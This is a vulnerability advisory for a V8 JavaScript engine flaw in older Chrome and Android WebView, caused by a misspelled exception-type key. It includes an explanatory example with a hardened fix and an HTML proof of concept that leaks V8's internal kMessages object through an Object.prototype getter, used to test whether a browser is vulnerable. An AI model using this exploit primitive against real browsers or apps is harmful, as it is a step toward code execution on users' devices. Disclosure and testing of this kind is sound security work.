Google V8 is the open-source JavaScript engine developed for the Chrome browser.
The vulnerability is caused by a typo in the V8 source: the exception type "observe_accept_invalid" was mistakenly written as "observe_invalid_accept".
An attacker can use the vulnerability to leak the internal kMessages object and achieve arbitrary code execution.
Mobile apps built on the WebView control of Android 4.4.4 through 5.1 are likely to be affected by this vulnerability.
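The root cause described above is a general JavaScript hazard: reading a key that is missing from a plain object does not fail, it continues up the prototype chain, so a getter installed on Object.prototype receives the table itself as `this`. The following added example (not code from the advisory or from V8) reproduces that behaviour on a constructed stand-in for the kMessages table and shows the defensive form, an own-property check on a null-prototype table. The names kMessages, THROWN_TYPE, lookupVulnerable and lookupHardened are assumptions made for the illustration.

```javascript
// Added example (not from the advisory): how a misspelled key in a message
// table lets a lookup fall through to Object.prototype, and how to close it.

// Constructed stand-in for V8's internal kMessages table: the key is spelled
// one way here...
const kMessages = {
  observe_invalid_accept: ["Third argument to Object.observe must be an array of strings."],
};

// ...but the throwing code asks for a differently spelled key (constructed
// to mirror the typo the advisory describes).
const THROWN_TYPE = "observe_accept_invalid";

// Vulnerable pattern: a plain-object table and a bare property read.
// A missing key is not an error; the read continues up the prototype chain.
function lookupVulnerable(table, type) {
  return table[type];
}

// Hardened pattern: only own properties count, and an unknown type is an error.
function lookupHardened(table, type) {
  if (!Object.prototype.hasOwnProperty.call(table, type)) {
    throw new Error("unknown message type: " + type);
  }
  return table[type];
}

// Same data, but with no prototype chain at all.
const kMessagesHardened = Object.assign(Object.create(null), kMessages);

// Simulate a page that installs a getter on Object.prototype for `type`.
// Returns whatever the getter captured as `this` during the lookup, or
// undefined if the getter was never reached.
function runWithPrototypeGetter(lookup, table, type) {
  let captured;
  Object.defineProperty(Object.prototype, type, {
    get() { captured = this; return undefined; },
    configurable: true,
  });
  try {
    try { lookup(table, type); } catch (e) { /* hardened path throws */ }
  } finally {
    delete Object.prototype[type]; // always remove the global side effect
  }
  return captured;
}

// leaked: the vulnerable lookup handed the whole table to the getter.
// safe:   the hardened lookup never reached Object.prototype.
function demo() {
  const leaked = runWithPrototypeGetter(lookupVulnerable, kMessages, THROWN_TYPE);
  const safe = runWithPrototypeGetter(lookupHardened, kMessagesHardened, THROWN_TYPE);
  return { leaked: leaked === kMessages, safe: safe === undefined };
}

console.log(demo()); // { leaked: true, safe: true }
```

The two fixes are independent: the own-property check rejects the misspelled type instead of silently reading it, and the null-prototype table removes the chain a getter could sit on, so either one alone would have stopped the leak in this example.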
Google Chrome V8 : 3.20 ~ 4.2 Version
Android: 4.4.4 ~ 5.1 Version
Code:
Proof of Concept
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>badkernel</title>
</head>
<body>
<script type="text/javascript">
var kMessages;
// Getter on Object.prototype for the misspelled exception type named above;
// a failed lookup in V8's internal message table falls through to it.
Object.prototype.__defineGetter__("observe_accept_invalid", function(){kMessages=this});
try{
  // An invalid third argument makes V8 raise that exception type.
  Object.observe({},function(){}, 1);
} catch(e) {
}
delete Object.prototype["observe_accept_invalid"];
// Shows an object on a vulnerable engine, undefined otherwise.
alert(kMessages);
</script>
</body>
</html>
Or open http://poc.hackertop.org/Android/v8rce_poc.html in the browser.
If the page can obtain the kMessages object (the alert shows an object), the browser is vulnerable.
If the alert shows undefined, it is not vulnerable.
The V8 version in use can be checked at chrome://version.
Reference:
http://www.cnnvd.org.cn/vulnerability/s ... 2016080414